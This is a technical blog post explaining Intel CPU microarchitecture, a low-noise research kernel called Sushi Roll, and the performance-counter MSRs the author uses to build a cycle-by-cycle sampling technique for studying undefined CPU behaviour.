<p>My workflow for research often starts with writing some custom tools for measuring and analysis of a given target. Whether the target is a web browser, PDF parser, remote attack surface, or a CPU, I’ve often found that the best thing you can do is just make something new. Try out some new attack surface, write a targeted fuzzer for a specific feature, etc. Doing something new doesn’t have to be better or more difficult than something that was done before, as often there are completely unexplored surfaces out there. My specialty is introspection. I find unique ways to measure behaviors, which then fuels the idea pool for code auditing or fuzzer development.</p>
<p>This leads to an interesting situation in CPU research… it’s largely blind. Lots of the current CPU research is done based on writing snippets of code and reviewing the overall side-effects of it (via cache timing, performance counters, etc). These overall side-effects may also include noise from other processor activity, from the OS task switching processes, other cores changing the MESI-state of cache lines, etc. I happened to already have a low-noise no-shared-memory research kernel that I developed for vectorized emulation on Xeon Phis! This lead to a really good starting point for throwing in some performance counters and measuring CPU behaviors… and the results were a bit better than expected.</p>
<p>TL;DR: I enjoy writing tools to measure things, so I wrote a tool to measure undefined CPU behavior.</p>
<hr />
<h1 id="the-gears-that-turn-in-your-cpu">The gears that turn in your CPU</h1>
<p><em>Feel free to skip this section entirely if you’re familiar with modern processor architecture</em></p>
<p>Your modern Intel CPU is a fairly complex beast when you care about every technical detail, but lets look at it from a higher level. Here’s what the micro-architecture (uArch) looks like in a modern Intel Skylake processor.</p>
<p><img src="/assets/skylake_server_block_diagram.svg" alt="Skylake diagram" />
<em><sub>Skylake uArch diagram, <a href="https://en.wikichip.org/w/images/e/ee/skylake_server_block_diagram.svg">Diagram from WikiChip</a></sub></em></p>
<p>There are 3 main components: The front end, which converts complex x86 instructions into groups of micro-operations. The execution engine, which executes the micro-operations. And the memory subsystem, which makes sure that the processor is able to get streams of instructions and data.</p>
<hr />
<h3 id="front-end">Front End</h3>
<p>The front end covers almost everything related to figuring out which micro-operations (uops) need to be dispatched to the execution engine in order to accomplish a task. The execution engine on a modern Intel processor does not directly execute x86 instructions, rather these instructions are converted to these micro-operations which are fixed in size and specific to the processor micro-architecture.</p>
<h4 id="instruction-fetch-and-cache">Instruction fetch and cache</h4>
<p>There’s a lot that happens prior to the actual execution of an instruction. First, the memory containing the instruction is read into the L1 instruction cache, ideally brought in from the L2 cache as to minimize delay. At this point the instruction is still a macro-op (a variable-length x86 instruction), which is quite a pain to work with. The processor still doesn’t know how large the instruction is, so during pre-decode the processor will do an initial length decode to determine the instruction boundaries.</p>
<p>At this point the instruction has been chopped up and is ready for the instruction queue!</p>
<h4 id="instruction-queue-and-macro-fusion">Instruction Queue and Macro Fusion</h4>
<p>Instructions that come in for execution might be quite simple, and could potentially be “fused” into a complex operation. This stage is not publicly documented, but we know that a very common fusion is combining compare instructions with conditional branches. This allows a common instruction pattern like:</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">cmp</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">5</span>
<span class="nf">jne</span> <span class="nv">.offset</span>
</code></pre></div></div>
<p>To be combined into a single macro-op with the same semantics. This complex fused operation now only takes up one slot in many parts of the CPU pipeline, rather than two, freeing up more resources to other operations.</p>
<h4 id="decode">Decode</h4>
<p>Instruction decode is where the x86 macro-ops get converted into micro-ops. These micro-ops vary heavily by uArch, and allow Intel to regularly change fundamentals in their processors without affecting backwards compatibility with the x86 architecture. There’s a lot of magic that happens in the decoder, but mostly what matters is that the variable-length macro-ops get converted into the fixed-length micro-ops. There are multiple ways that this conversion happens. Instructions might directly convert to uops, and this is the common path for most x86 instructions. However, some instructions, or even processor conditions, may cause something called microcode to get executed.</p>
<h4 id="microcode">Microcode</h4>
<p>Some instructions in x86 trigger microcode to be used. Microcode is effectively a tiny collection of uops which will be executed on certain conditions. Think of this like a C/C++ macro, where you can have a one-liner for something that expands to much more. When an operation does something that requires microcode, the microcode ROM is accessed and the uops it specifies are placed into the pipeline. These are often complex operations, like switching operating modes, reading/writing internal CPU registers, etc. This microcode ROM also gives Intel an opportunity to make changes to instruction behaviors entirely with a microcode patch.</p>
<h4 id="uop-cache">uop Cache</h4>
<p>There’s also a uop cache which allows previously decoded instructions to skip the entire pre-decode and decode process. Like standard memory caching, this provides a huge speedup and dramatically reduces bottlenecks in the front-end.</p>
<h4 id="allocation-queue">Allocation Queue</h4>
<p>The allocation queue is responsible for holding a bunch of uops which need to be executed. These are then fed to the execution engine when the execution engine has resources available to execute them.</p>
<hr />
<h3 id="execution-engine">Execution engine</h3>
<p>The execution engine does exactly what you would expect: it executes things. But at this stage your processor starts moving your instructions around to speed things up.</p>
<p><a href="/assets/graph_desc.png"><img src="/assets/graph_desc.png" /></a>
<em><sub>Things start to get a bit complex at this point, click for details!</sub></em></p>
<h4 id="renaming--allocating--retirement">Renaming / Allocating / Retirement</h4>
<p>Resources need to be allocated for certain operations. There are a lot more registers in the processor than the standard x86 registers. These registers are allocated out for temporary operations, and often mapped onto their corresponding x86 registers.</p>
<p>There are a lot of optimizations the CPU can do at this stage. It can eliminate register moves by aliasing registers (such that two x86 registers “point to” the same internal register). It can remove known zeroing instructions (like <code class="language-plaintext highlighter-rouge">xor</code> with self, or <code class="language-plaintext highlighter-rouge">and</code> with zero) from the pipeline, and just zero the registers directly. These optimizations are frequently improved each generation.</p>
<p>Finally, when instructions have completed successfully, they are retired. This retirement commits the internal micro-architectural state back out to the x86 architectural state. It’s also when memory operations become visible to other CPUs.</p>
<h4 id="re-ordering">Re-ordering</h4>
<p>uOP re-ordering is important to modern CPU performance. Future instructions which do not depend on the current instruction, could execute while waiting for the results of the current one.</p>
<p>For example:</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nb">rax</span><span class="p">]</span>
<span class="nf">add</span> <span class="nb">rbx</span><span class="p">,</span> <span class="nb">rcx</span>
</code></pre></div></div>
<p>In this short example we see that we perform a 64-bit load from the address in <code class="language-plaintext highlighter-rouge">rax</code> and store it back into <code class="language-plaintext highlighter-rouge">rax</code>. Memory operations can be quite expensive, ranging from 4 cycles for a L1 cache hit, to 250 cycles and beyond for an off-processor memory access.</p>
<p>The processor is able to realize that the <code class="language-plaintext highlighter-rouge">add rbx, rcx</code> instruction does not need to “wait” for the result of the load, and can send off the <code class="language-plaintext highlighter-rouge">add</code> uop for execution while waiting for the load to complete.</p>
<p>This is where things can start to get weird. The processor starts to perform operations in a different order than what you told it to. The processor then holds the results and makes sure they “appear” to other cores in the correct order, as x86 is a strongly-ordered architecture. Other architectures like ARM are typically weakly-ordered, and it’s up to the developer to insert fences in the instruction stream to tell the processor the specific order operations need to complete in. This ordering is not an issue on a single core, but it may affect the way another core observes the memory transactions you perform.</p>
<p>For example:</p>
<p>Core 0 executes the following:</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">mov</span> <span class="p">[</span><span class="nv">shared_memory.pointer</span><span class="p">],</span> <span class="nb">rax</span> <span class="c1">; Store the pointer in `rax` to shared memory</span>
<span class="nf">mov</span> <span class="p">[</span><span class="nv">shared_memory.owned</span><span class="p">],</span> <span class="mi">0</span> <span class="c1">; Mark that we no longer own the shared memory</span>
</code></pre></div></div>
<p>Core 1 executes the following:</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nl">.try_again:</span>
<span class="nf">cmp</span> <span class="p">[</span><span class="nv">shared_memory.owned</span><span class="p">],</span> <span class="mi">0</span> <span class="c1">; Check if someone owns this memory</span>
<span class="nf">jne</span> <span class="nv">.try_again</span> <span class="c1">; Someone owns this memory, wait a bit longer</span>
<span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nv">shared_memory.pointer</span><span class="p">]</span> <span class="c1">; Get the pointer</span>
<span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nb">rax</span><span class="p">]</span> <span class="c1">; Read from the pointer</span>
</code></pre></div></div>
<p>On x86 this is safe, as all aligned loads and stores are atomic, and are commit in a way that they appear in-order to all other processors. On something like ARM the <code class="language-plaintext highlighter-rouge">owned</code> value could be written to prior to <code class="language-plaintext highlighter-rouge">pointer</code> being written, allowing core 1 to use a stale/invalid pointer.</p>
<h4 id="execution-units">Execution Units</h4>
<p>Finally we got to an easy part: the execution units. This is the silicon that is responsible for actually performing maths, loads, and stores. The core has multiple copies of this hardware logic for some of the common operations, which allows the same operation to be performed in parallel on separate data. For example, an add can be performed on 4 different execution units.</p>
<p>For things like loads, there are 2 load ports (port 2 and port 3), this allows 2 independent loads to be executed per cycle. Stores on the other hand, only have one port (port 4), and thus the core can only perform one store per cycle.</p>
<hr />
<h3 id="memory-subsystem">Memory subsystem</h3>
<p>The memory subsystem on Intel is pretty complex, but we’re only going to go into the basics.</p>
<h4 id="caches">Caches</h4>
<p>Caches are critical to modern CPU performance. RAM latency is so high (150-250 cycles) that a CPU is largely unusable without a cache. For example, if a modern x86 processor at 2.2 GHz had all caches disabled, it would never be able to execute more than ~15 million instructions per second. That’s as slow as an Intel 80486 from 1991.</p>
<p>When working on my first hypervisor I actually disabled all caching by mistake, and Windows took multiple hours to boot. It’s pretty incredible how important caches are.</p>
<p>For x86 there are typically 3 levels of cache: A level 1 cache, which is extremely fast, but small: 4 cycles latency. Followed by a level 2 cache, which is much larger, but still quite small: 14 cycles latency. Finally there’s the last-level-cache (LLC, typically the L3 cache), this is quite large, but has a higher latency: ~60 cycles.</p>
<p>The L1 and L2 caches are present in each core, however, the L3 cache is shared between multiple cores.</p>
<h4 id="translation-lookaside-buffers-tlbs">Translation Lookaside Buffers (TLBs)</h4>
<p>In modern CPUs, applications almost never interface with physical memory directly. Rather they go through address translation to convert virtual addresses to physical addresses. This allows contiguous virtual memory regions to map to fragmented physical memory. Performing this translation requires 4 memory accesses (on 64-bit 4-level paging), and is quite expensive. Thus the CPU caches recently translated addresses such that it can skip this translation process during memory operations.</p>
<p>It is up to the OS to tell the CPU when to flush these TLBs via an invalidate page, <code class="language-plaintext highlighter-rouge">invlpg</code> instruction. If the OS doesn’t correctly <code class="language-plaintext highlighter-rouge">invlpg</code> memory when mappings change, it’s possible to use stale translation information.</p>
<h4 id="line-fill-buffers">Line fill buffers</h4>
<p>While a load is pending, and not yet present in L1 cache, the data lives in a line fill buffer. The line fill buffers live between L2 cache and your L1 cache. When a memory access misses L1 cache, a line fill buffer entry is allocated, and once the load completes, the LFB is copied into the L1 cache and the LFB entry is discarded.</p>
<h4 id="store-buffer">Store buffer</h4>
<p>Store buffers are similar to line fill buffers. While waiting for resources to be available for a store to complete, it is placed into a store buffer. This allows for up to 56 stores (on Skylake) to be queued up, even if all other aspects of the memory subsystem are currently busy, or stores are not ready to be retired.</p>
<p>Further, loads which access memory will query the store buffers to potentially bypass the cache. If a read occurs on a recently stored location, the read could directly be filled from the store buffers. This is called store forwarding.</p>
<h4 id="load-buffers">Load buffers</h4>
<p>Similar to store buffers, load buffers are used for pending load uops. This sits between your execution units and L1 cache. This can hold up to 72 entries on Skylake.</p>
<h1 id="cpu-architecture-summary-and-more-info">CPU architecture summary and more info</h1>
<p>That was a pretty high level introduction to many of the aspects of modern Intel CPU architecture. Every component of this diagram could have an entire blog written on it. <a href="https://software.intel.com/en-us/articles/intel-sdm">Intel Manuals</a>, <a href="https://en.wikichip.org/">WikiChip</a>, <a href="https://www.agner.org/optimize/">Agner Fog’s CPU documentation</a>, and many more, provide a more thorough documentation of Intel micro-architecture.</p>
<hr />
<h1 id="sushi-roll">Sushi Roll</h1>
<p>Sushi Roll is one of my favorite kernels! It wasn’t originally designed for CPU introspection, but it had some neat features which made it much more suitable for CPU research than my other kernels. We’ll talk a bit about why this kernel exists, and then talk about why it quickly became my go-to kernel for CPU research.</p>
<p><a href="/assets/sushi_roll_squishable.jpg"><img src="/assets/sushi_roll_squishable.jpg" /></a>
<em><sub>Kernel mascot: <a href="https://www.squishable.com/mm5/merchant.mvc?Screen=PROD&Product_Code=squish_shrimp_sushi_15">Squishble Sushi Roll</a></sub></em></p>
<h4 id="a-primer-on-knights-landing">A primer on Knights Landing</h4>
<p>Sushi Roll was originally designed for my <a href="https://gamozolabs.github.io/fuzzing/2018/10/14/vectorized_emulation.html">Vectorized Emulation</a> work. Vectorized emulation was designed for the Intel Xeon Phi (Knights Landing), which is a pretty strange architecture. Even though it’s fully-featured traditional x86, standard software will “just work” on it, it is quite slow per individual thread. First of all, the clock rates are ~1.3 GHz, so there alone it’s about 2-3x slower than a “standard” x86 processor. Even further, it has fewer CPU resources for re-ordering and instruction decode. All-in-all the CPU is about 10x slower when running a single-threaded application compared to a “standard” 3 GHz modern Intel CPU. There’s also no L3 cache, so memory accesses can become much more expensive.</p>
<p>On top of these simple performance issues, there are more complex issues due to 4-way hyperthreading. Knights Landing was designed to be 4-way hyperthreaded (4 threads per core) to alleviate some of the performance losses of the limited instruction decode and caching. This allows threads to “block” on memory accesses while other threads with pending computations use the execution units. This 4-way hyperthreading, combined with 64-core processors, leads to 256 hardware threads showing up to your OS as cores.</p>
<p>Migrating processes and resources between these threads can be catastrophically slow. Standard shared-memory models also start to fall apart at this level of scaling (without specialized tuning). For example: If all 256 threads are hammering the same memory by performing an atomic increment (<code class="language-plaintext highlighter-rouge">lock inc</code> instruction), each individual increment will start to cost over 10,000 cycles! This is enough time for a single core on the Xeon Phi to do 640,000 single-precision floating point operations… just from a single increment! While most software treats atomics as “free locks”, they start to cause some serious cache-coherency pollution when scaled out this wide.</p>
<p>Obviously with some careful development you can mitigate these issues by decreasing the frequency of shared memory accesses. But perhaps we can develop a kernel that fundamentally disallows this behavior, preventing a developer from ever starting to go down the wrong path!</p>
<h4 id="the-original-intent-of-sushi-roll">The original intent of Sushi Roll</h4>
<p>Sushi Roll was designed from the start to be a massively parallel message-passing based kernel. The most notable feature of Sushi Roll is that there is no mutable shared memory allowed (a tiny exception made for the core IPC mechanism). This means that if you ever want to share information with another processor, you must pass that information via IPC. Shared immutable memory however, is allowed, as this doesn’t cause cache coherency traffic.</p>
<p>This design also meant that a lock never needed to be held, even atomic-level locks using the <code class="language-plaintext highlighter-rouge">lock</code> prefix. Rather than using locks, a specific core would own a hardware resource. For example, core #0 may own the network card, or a specific queue on the network card. Instead of requesting exclusive access to the NIC by obtaining a lock, you would send a message to core #0, indicating that you want to send a packet. All of the processing of these packets is done by the sender, thus the data is already formatted in a way that can be directly dropped into the NIC ring buffers. This made the owner of a hardware resource simply a mediator, reducing the latency to that resource.</p>
<p>While this makes the internals of the kernel a bit more complex, the programming model that a developer sees is still a standard <code class="language-plaintext highlighter-rouge">send()</code>/<code class="language-plaintext highlighter-rouge">recv()</code> model. By forcing message-passing, this ensured that all software written for this kernel could be scaled between multiple machines with no modification. On a single computer there is a fast, low-latency IPC mechanism that leverages some of the abilities to share memory (by transferring ownership of physical memory to the receiver). If the target for a message resided on another computer on the network, then the message would be serialized in a way that could be sent over the network. This complexity is yet again hidden from the developer, which allows for one program to be made that is scaled out without any extra effort.</p>
<h4 id="no-interrupts-no-timers-no-software-threads-no-processes">No interrupts, no timers, no software threads, no processes</h4>
<p>Sushi Roll follows a similar model to most of my other kernels. It has no interrupts, no timers, no software threads, and no processes. These are typically required for traditional operating systems, as to provide a user experience with multiple processes and users. However, my kernels are always designed for one purpose. This means the kernel boots up, and just does a given task on all cores (sometimes with one or two cores having a “special” responsibility).</p>
<p>By removing all of these external events, the CPU behaves a lot more deterministically. Sushi Roll goes the extra mile here, as it further reduces CPU noise by not having cores sharing memory and causing unexpected cache evictions or coherency traffic.</p>
<h4 id="soft-reboots">Soft Reboots</h4>
<p>Similar to kexec on Linux, my kernels always support soft rebooting. This allows the old kernel (even a double faulted/corrupted kernel) to be replaced by a new kernel. This process takes about 200-300ms to tear down the old kernel, download the new one over PXE, and run the new one. This makes it feasible to have such a specialized kernel without processes, since I can just change the code of the kernel and boot up the new one in under a second. Rapid prototyping is crucial to fast development, and without this feature this kernel would be unusable.</p>
<h4 id="sushi-roll-conclusion">Sushi Roll conclusion</h4>
<p>Sushi Roll ended up being the perfect kernel for CPU introspection. It’s the lowest noise kernel I’ve ever developed, and it happened to also be my flagship kernel right as Spectre and Meltdown came out. By not having processes, threads, or interrupts, the CPU behaves much more deterministically than in a traditional OS.</p>
<hr />
<h1 id="performance-counters">Performance Counters</h1>
<p>Before we get into how we got cycle-by-cycle micro-architectural data, we must learn a little bit about the performance monitoring available on Intel CPUs! This information can be explored in depth in the Intel System Developer Manual Volume 3b (note that the combined volume 3 manual doesn’t go into as much detail as the specific sub-volume manual).</p>
<p><img src="/assets/pmcmanual.png" alt="Performance Counter Manual" /></p>
<p>Intel CPUs have a performance monitoring subsystem relying largely on a set of model-specific-registers (MSRs). These MSRs can be configured to track certain architectural events, typically by counting them. These counters are formally “performance monitoring counters”, often referred to as “performance counters” or PMCs.</p>
<p>These PMCs vary by micro-architecture. However, over time Intel has committed to offering a small subset of counters between multiple micro-architectures. These are called architectural performance counters. The version of these architectural performance counters are found in <code class="language-plaintext highlighter-rouge">CPUID.0AH:EAX[7:0]</code>. As of this writing there are 4 versions of architectural performance monitoring. The latest version provides a decent amount of generic information useful to general-purpose optimization. However, for a specific micro-architecture, the possibilities of performance events to track are almost limitless.</p>
<h4 id="basic-usage-of-performance-counters">Basic usage of performance counters</h4>
<p>To use the performance counters on Intel there are a few steps involved. First you must find a performance event you want to monitor. This information is found in per-micro-architecture tables found in the Intel Manual Volume 3b “Performance-Monitoring Events” chapter.</p>
<p>For example, here’s a very small selection of Skylake-specific performance events:</p>
<p><img src="/assets/skylake_perfctr.png" alt="Skylake Events" /></p>
<p>Intel performance counters largely rely on two banks of MSRs. The performance event selection MSRs, where the different events are programmed using the umask and event numbers from the table above. And the performance counter MSRs which hold the counts themselves.</p>
<p>The performance event selection MSRs (<code class="language-plaintext highlighter-rouge">IA32_PERFEVTSELx</code>) start at address <code class="language-plaintext highlighter-rouge">0x186</code> and span a contiguous MSR region. The layout of these event selection MSRs varies slightly by micro-architecture. The number of counters available varies by CPU and is dynamically checked by reading <code class="language-plaintext highlighter-rouge">CPUID.0AH:EAX[15:8]</code>. The performance counter MSRs (<code class="language-plaintext highlighter-rouge">IA32_PMCx</code>) start at address <code class="language-plaintext highlighter-rouge">0xc1</code> and also span a contiguous MSR region. The counters have an micro-architecture-specific number of bits they support, found in <code class="language-plaintext highlighter-rouge">CPUID.0AH:EAX[23:16]</code>. Reading and writing these MSRs is done via the <code class="language-plaintext highlighter-rouge">rdmsr</code> and <code class="language-plaintext highlighter-rouge">wrmsr</code> instructions respectively.</p>
<p>Typically modern Intel processors support 4 PMCs, and thus will have 4 event selection MSRs (<code class="language-plaintext highlighter-rouge">0x186</code>, <code class="language-plaintext highlighter-rouge">0x187</code>, <code class="language-plaintext highlighter-rouge">0x188</code>, and <code class="language-plaintext highlighter-rouge">0x189</code>) and 4 counter MSRs (<code class="language-plaintext highlighter-rouge">0xc1</code>, <code class="language-plaintext highlighter-rouge">0xc2</code>, <code class="language-plaintext highlighter-rouge">0xc3</code>, and <code class="language-plaintext highlighter-rouge">0xc4</code>). Most processors have 48-bit performance counters. It’s important to dynamically detect this information!</p>
<p>Here’s what the <code class="language-plaintext highlighter-rouge">IA32_PERFEVTSELx</code> MSR looks like for PMC version 3:</p>
<p><img src="/assets/perfevtsel.png" alt="Performance Event Selection" /></p>
<table>
<thead>
<tr>
<th>Field</th>
<th>Meaning</th>
</tr>
</thead>
<tbody>
<tr>
<td>Event Select</td>
<td>Holds the event number from the event tables, for the event you are interested in</td>
</tr>
<tr>
<td>Unit Mask</td>
<td>Holds the umask value from the event tables, for the event you are interested in</td>
</tr>
<tr>
<td>USR</td>
<td>If set, this counter counts during user-land code execution (ring level != 0)</td>
</tr>
<tr>
<td>OS</td>
<td>If set, this counter counts during OS execution (ring level == 0)</td>
</tr>
<tr>
<td>E</td>
<td>If set, enables edge detection of the event being tracked. Counts de-asserted to asserted transitions, which allows for timing of events</td>
</tr>
<tr>
<td>PC</td>
<td>Pin control allows for some hardware monitoring of events, like… the actual pins on the CPU</td>
</tr>
<tr>
<td>INT</td>
<td>Generate an interrupt through the APIC if an overflow occurs of the (usually 48-bit) counter</td>
</tr>
<tr>
<td>ANY</td>
<td>Increment the performance event when any hardware thread on a given physical core triggers the event, otherwise it only increments for a single logical thread</td>
</tr>
<tr>
<td>EN</td>
<td>Enable the counter</td>
</tr>
<tr>
<td>INV</td>
<td>Invert the counter mask, which changes the meaning of the <code class="language-plaintext highlighter-rouge">CMASK</code> field from a >= comparison (if this bit is 0), to a < comparison (if this bit is 1)</td>
</tr>
<tr>
<td>CMASK</td>
<td>If non-zero, the CPU only increments the performance counter when the event is triggered >= (or < if <code class="language-plaintext highlighter-rouge">INV</code> is set) <code class="language-plaintext highlighter-rouge">CMASK</code> times in a single cycle. This is useful for filtering events to more specific situations. If zero, this has no effect and the counter is incremented for each event</td>
</tr>
</tbody>
</table>
<p>And that’s about it! Find the right event you want to track in your specific micro-architecture’s table, program it in one of the <code class="language-plaintext highlighter-rouge">IA32_PERFEVTSELx</code> registers with the correct event number and umask, set the <code class="language-plaintext highlighter-rouge">USR</code> and/or <code class="language-plaintext highlighter-rouge">OS</code> bits depending on what type of code you want to track, and set the <code class="language-plaintext highlighter-rouge">E</code> bit to enable it! Now the corresponding <code class="language-plaintext highlighter-rouge">IA32_PMCx</code> counter will be incrementing every time that event occurs!</p>
<h4 id="reading-the-pmc-counts-faster">Reading the PMC counts faster</h4>
<p>Instead of performing a <code class="language-plaintext highlighter-rouge">rdmsr</code> instruction to read the <code class="language-plaintext highlighter-rouge">IA32_PMCx</code> values, instead a <code class="language-plaintext highlighter-rouge">rdpmc</code> instruction can be used. This instruction is optimized to be a little bit faster and supports a “fast read mode” if <code class="language-plaintext highlighter-rouge">ecx[31]</code> is set to 1. This is typically how you’d read the performance counters.</p>
<h4 id="performance-counters-version-2">Performance Counters version 2</h4>
<p>In the second version of performance counters, Intel added a bunch of new features.</p>
<p>Intel added some fixed performance counters (<code class="language-plaintext highlighter-rouge">IA32_FIXED_CTR0</code> through <code class="language-plaintext highlighter-rouge">IA32_FIXED_CTR2</code>, starting at address <code class="language-plaintext highlighter-rouge">0x309</code>) which are not programmable. These are configured by <code class="language-plaintext highlighter-rouge">IA32_FIXED_CTR_CTRL</code> at address <code class="language-plaintext highlighter-rouge">0x38d</code>. Unlike normal PMCs, these cannot be programmed to count any event. Rather the controls for these only allows the selection of which CPU ring level they increment at (or none to disable it), and whether or not they trigger an interrupt on overflow. No other control is provided for these.</p>
<table>
<thead>
<tr>
<th>Fixed Performance Counter</th>
<th>MSR</th>
<th>Meaning</th>
</tr>
</thead>
<tbody>
<tr>
<td>IA32_FIXED_CTR0</td>
<td>0x309</td>
<td>Counts number of retired instructions</td>
</tr>
<tr>
<td>IA32_FIXED_CTR1</td>
<td>0x30a</td>
<td>Counts number of core cycles while the processor is not halted</td>
</tr>
<tr>
<td>IA32_FIXED_CTR2</td>
<td>0x30b</td>
<td>Counts number of timestamp counts (TSC) while the processor is not halted</td>
</tr>
</tbody>
</table>
<p>These are then enabled and disabled by:</p>
<p><img src="/assets/fixedctrctrl.png" alt="Fixed Counter Control" /></p>
<p>The second version of performance counters also added 3 new MSRs that allow “bulk management” of performance counters. Rather than checking the status and enabling/disabling each performance counter individually, Intel added 3 global control MSRs. These are <code class="language-plaintext highlighter-rouge">IA32_PERF_GLOBAL_CTRL</code> (address <code class="language-plaintext highlighter-rouge">0x38f</code>) which allows enabling and disabling performance counters in bulk. <code class="language-plaintext highlighter-rouge">IA32_PERF_GLOBAL_STATUS</code> (address <code class="language-plaintext highlighter-rouge">0x38e</code>) which allows checking the overflow status of all performance counters in one <code class="language-plaintext highlighter-rouge">rdmsr</code>. And <code class="language-plaintext highlighter-rouge">IA32_PERF_GLOBAL_OVF_CTRL</code> (address <code class="language-plaintext highlighter-rouge">0x390</code>) which allows for resetting the overflow status of all performance counters in one <code class="language-plaintext highlighter-rouge">wrmsr</code>. Since <code class="language-plaintext highlighter-rouge">rdmsr</code> and <code class="language-plaintext highlighter-rouge">wrmsr</code> are serializing instructions, these can be quite expensive and being able to reduce the amount of them is important!</p>
<p>Global control (simple, allows masking of individual counters from one MSR):</p>
<p><img src="/assets/perfglobalctrl.png" alt="Performance Global Control" /></p>
<p>Status (tracks overflows of various counters, with a global condition changed tracker):</p>
<p><img src="/assets/perfglobalstatus.png" alt="Performance Global Status" /></p>
<p>Status control (writing a <code class="language-plaintext highlighter-rouge">1</code> to any of these bits clears the corresponding bit in <code class="language-plaintext highlighter-rouge">IA32_PERF_GLOBAL_STATUS</code>):</p>
<p><img src="/assets/perfglobalstatusctrl.png" alt="Performance Global Status" /></p>
<p>Finally, Intel added 2 bits to the existing <code class="language-plaintext highlighter-rouge">IA32_DEBUGCTL</code> MSR (address <code class="language-plaintext highlighter-rouge">0x1d9</code>). These 2 bits <code class="language-plaintext highlighter-rouge">Freeze_LBR_On_PMI</code> (bit 11) and <code class="language-plaintext highlighter-rouge">Freeze_PerfMon_On_PMI</code> (bit 12) allow freezing of last branch recording (LBR) and performance monitoring on performance monitor interrupts (often due to overflows). These are designed to reduce the measurement of the interrupt itself when an overflow condition occurs.</p>
<h4 id="performance-counters-version-3">Performance Counters version 3</h4>
<p>Performance counters version 3 was pretty simple. Intel added the <code class="language-plaintext highlighter-rouge">ANY</code> bit to <code class="language-plaintext highlighter-rouge">IA32_PERFEVTSELx</code> and <code class="language-plaintext highlighter-rouge">IA32_FIXED_CTR_CTRL</code> to allow tracking of performance events on any thread on a physical core. Further, the performance counters went from a fixed number of 2 counters, to a variable amount of counters. This resulted in more bits being added to the global status, overflow, and overflow control MSRs, to control the corresponding counters.</p>
<p><img src="/assets/perfv3globals.png" alt="Performance Global Status" /></p>
<h4 id="performance-counters-version-4">Performance Counters version 4</h4>
<p>Performance counters version 4 is pretty complex in detail, but ultimately it’s fairly simple. Intel renamed some of the MSRs (for example <code class="language-plaintext highlighter-rouge">IA32_PERF_GLOBAL_OVF_CTRL</code> became <code class="language-plaintext highlighter-rouge">IA32_PERF_GLOBAL_STATUS_RESET</code>). Intel also added a new MSR <code class="language-plaintext highlighter-rouge">IA32_PERF_GLOBAL_STATUS_SET</code> (address <code class="language-plaintext highlighter-rouge">0x391</code>) which instead of clearing the bits in <code class="language-plaintext highlighter-rouge">IA32_PERF_GLOBAL_STATUS</code>, allows for setting of the bits.</p>
<p>Further, the freezing behavior enabled by <code class="language-plaintext highlighter-rouge">IA32_DEBUGCTL.Freeze_LBR_On_PMI</code> and <code class="language-plaintext highlighter-rouge">IA32_DEBUGCTL.Freeze_PerfMon_On_PMI</code> was streamlined to have a single bit which tracks the “freeze” state of the PMCs, rather than clearing the corresponding bits in the <code class="language-plaintext highlighter-rouge">IA32_PERF_GLOBAL_CTRL</code> MSR. This change is awesome as it reduces the cost of freezing and unfreezing the performance monitoring unit (PMU), but it’s actually a breaking change from previous versions of performance counters.</p>
<p>Finally, they added a mechanism to allow sharing of performance counters between multiple users. This is not really relevant to anything we’re going to talk about, so we won’t go into details.</p>
<h4 id="conclusion">Conclusion</h4>
<p>Performance counters started off pretty simple, but Intel added more and more features over time. However, these “new” features are critical to what we’re about to do next :)</p>
<hr />
<h1 id="cycle-by-cycle-micro-architectural-sampling">Cycle-by-cycle micro-architectural sampling</h1>
<p>Now that we’ve gotten some prerequisites out of the way, lets talk about the main course of this blog: A creative use of performance counters to get cycle-by-cycle micro-architectural information out of Intel CPUs!</p>
<p>It’s important to note that this technique is meant to assist in finding and learning things about CPUs. The data it generates is not particularly easy to interpret or work with, and there are many pitfalls to be aware of!</p>
<h4 id="the-goal">The Goal</h4>
<p>Performance counters are incredibly useful in categorizing micro-architectural behavior on an Intel CPU. However, these counters are often used on a block or whole program entirely, and viewed as a single data point over the whole run. For example, one might use performance counters to track the number of times there’s a cache miss in their program under test. This will give a single number as an output, giving an indication of how many times the cache was missed, but it doesn’t help much in telling you when they occurred. By some binary searching (or creative use of counter overflows) you can get a general idea of when the event occurred, but I wanted more information.</p>
<p>More specifically, I wanted to view micro-architectural data on a graph, where the x-axis was in cycles. This would allow me to see (with cycle-level granularity) when certain events happened in the CPU.</p>
<h4 id="the-idea">The Idea</h4>
<p>We’ve set a pretty lofty goal for ourselves. We effectively want to link two performance counters with each other. In this case we want to use an arbitrary performance counter for some event we’re interested in, and we want to link it to a performance counter tracking the number of cycles elapsed. However, there doesn’t seem to be a direct way to perform this linking.</p>
<p>We know that we can have multiple performance counters, so we can configure one to count a given event, and another to count cycles. However, in this case we’re not able to capture information at each cycle, as we have no way of reading these counters together. We also cannot stop the counters ourselves, as stopping the counters requires injecting a <code class="language-plaintext highlighter-rouge">wrmsr</code> instruction which cannot be done on an arbitrary cycle boundary, and definitely cannot be done during speculation.</p>
<p>But there’s a small little trick we can use. We can stop multiple performance counters at the same time by using the <code class="language-plaintext highlighter-rouge">IA32_DEBUGCTL.Freeze_PerfMon_On_PMI</code> feature. When a counter ends up overflowing, an interrupt occurs (if configured as such). When this overflow occurs, the freeze bit in <code class="language-plaintext highlighter-rouge">IA32_PERF_GLOBAL_STATUS</code> is set (version 4 PMCs specific feature), causing <em>all</em> performance counters to stop.</p>
